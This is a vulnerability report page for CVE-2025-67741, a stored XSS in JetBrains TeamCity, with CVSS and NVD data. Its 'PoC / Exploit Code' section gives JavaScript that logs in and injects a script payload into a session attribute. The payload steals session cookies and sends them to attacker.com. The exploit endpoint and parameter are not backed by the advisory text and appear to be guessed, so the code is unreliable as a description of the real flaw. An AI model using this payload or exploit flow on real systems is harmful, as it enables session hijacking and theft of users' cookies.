Security Vulnerability Report
CVE-2025-67741 CVSS 4.6 MEDIUM

CVE-2025-67741

Published: 2025-12-11 16:16:36
Last Modified: 2025-12-15 20:06:59

Description

In JetBrains TeamCity before 2025.11 stored XSS was possible via session attribute

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains TeamCity < 2025.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-67741 PoC - JetBrains TeamCity Stored XSS via Session Attribute
// This PoC demonstrates how an attacker can inject malicious JavaScript through session attributes

// Step 1: Login to TeamCity with a valid account
const teamcityUrl = 'https://teamcity.example.com';
const credentials = {
  username: 'attacker',
  password: 'password123'
};

// Step 2: Inject XSS payload into session attribute
// The payload will be stored and executed when other users view the affected page
const xssPayload = `<script>
  // Steal session cookies
  var cookies = document.cookie;
  // Send stolen data to attacker's server
  fetch('https://attacker.com/collect?data=' + btoa(cookies), {
    method: 'GET',
    mode: 'no-cors'
  });
  // Alternative payload: Session hijacking
  console.log('Session Hijacking - Cookie:', cookies);
</script>`;

// Step 3: Exploit function - inject payload into session attribute
async function exploitStoredXSS() {
  // Login to TeamCity
  const loginResponse = await fetch(`${teamcityUrl}/login.html`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: `username=${credentials.username}&password=${credentials.password}&submit=Login`
  });

  // Inject malicious session attribute
  // This targets the vulnerable session attribute parameter
  const injectResponse = await fetch(`${teamcityUrl}/app/session-attribute`, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Cookie': loginResponse.headers.get('Set-Cookie')
    },
    body: JSON.stringify({ name: 'userDisplayName', value: xssPayload })
  });

  console.log('XSS payload injected successfully');
  console.log('Payload will execute when victims visit affected pages');
}

// Mitigation: Update to TeamCity 2025.11 or later
// The patch adds proper HTML encoding for session attributes
const mitigationNote = `
REMEDIATION:
1. Upgrade JetBrains TeamCity to version 2025.11 or later
2. Review user session attributes for suspicious content
3. Implement Content Security Policy (CSP) headers
4. Enable audit logging for session attribute modifications
`;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67741", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:35.600", "lastModified": "2025-12-15T20:06:58.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11 stored XSS was possible via session attribute"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11", "matchCriteriaId": "D80D5E22-CFD6-4363-948C-9473EFCE21A5"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}